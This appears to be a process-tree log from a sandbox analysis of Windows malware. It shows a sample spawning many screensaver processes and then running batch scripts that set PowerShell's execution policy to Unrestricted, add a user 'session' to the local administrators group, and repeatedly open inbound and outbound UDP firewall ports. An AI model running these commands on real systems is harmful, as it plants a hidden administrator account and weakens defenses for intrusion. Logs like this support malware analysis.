C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2844

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2616

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2916

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2900

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1648

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2948

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2172

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2796

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1168

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2324

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2964

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:684

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2416

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2472

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:784

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2568

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2316

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2656

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2484

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2052

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2236

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2968

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2756

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2992

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2560

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3040

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2284

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2576

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1108

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2328

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2608

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2996

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1216

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2980

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2948

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:800

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2532

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3056

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2892

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2172

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2284

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:896

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2600

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:108

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2164

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2132

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2096

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2860

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2996

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1772

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2580

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2456

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2956

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2560

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:836

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2872

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2504

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2392

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2676

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2316

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1772

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2640

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2980

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1280

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2968

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2332

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2904

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2416

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2236

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:588

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2868

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3056

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2200

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2624

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2440

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1116

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2452

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2684

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2936

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2964

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3040

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1756

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3004

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:588

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3056

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2180

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:108

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3016

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2524

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2984

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1820

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2144

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2108

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2116

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1368

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2880

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2084

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K black.bat
2⤵
PID:1744

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1200

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1600

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1244

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1104

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1984

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2080

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2176

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2320

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2528

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2272

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2536

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2816

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2412

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2544

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2524

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2704

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2552

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2640

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1308

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2912

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2344

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2480

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:564

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2464

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2176

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2668

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2396

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2604

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2924

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2416

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2668

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1732

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1716

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2516

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:888

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2276

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2336

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1740

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2252

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2420

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2616

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2920

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1308

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2800

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2396

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:700

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2876

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1560

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2460

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:300

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2180

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2528

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2832

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2060

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1988

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3024

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3016

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2476

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2624

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1572

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2680

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2720

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1600

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2088

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2840

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2068

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2560

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1240

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2892

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2872

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2604

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1488

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2848

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2356

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2844

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3016

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2828

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2580

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2096

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2332

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2596

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3068

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2920

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2256

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2120

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2172

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2468

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1592

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2540

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2820

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2620

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1932

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2444

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2420

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2200

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:1244

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2980

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2564

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2092

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2352

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2332

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2932

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2184

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2292

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:3044

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2156

C:\Windows\system32\scrnsave.scr
C:\Windows\system32\scrnsave.scr /s
3⤵
PID:2712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K FuckPorts.cmd
2⤵
PID:952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
3⤵
PID:968

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
3⤵
PID:2436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
4⤵
PID:2448

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2540

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2964

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2272

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:428

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3004

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2960

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1488

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:108

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2924

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1800

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2700

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2712

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3004

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:1108

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2776

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2952

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:992

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2696

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2436

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2872

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2296

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2064

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:3024

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2580

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2052

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2756

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2792

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2296

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1544

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2136

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:1244

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:2376

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2572

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 5283" dir=out action=allow protocol=UDP localport=3359
3⤵
PID:3020

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port 22355" dir=in action=allow protocol=UDP localport=13745
3⤵
PID:2316

C:\Windows\system32\netsh.exe
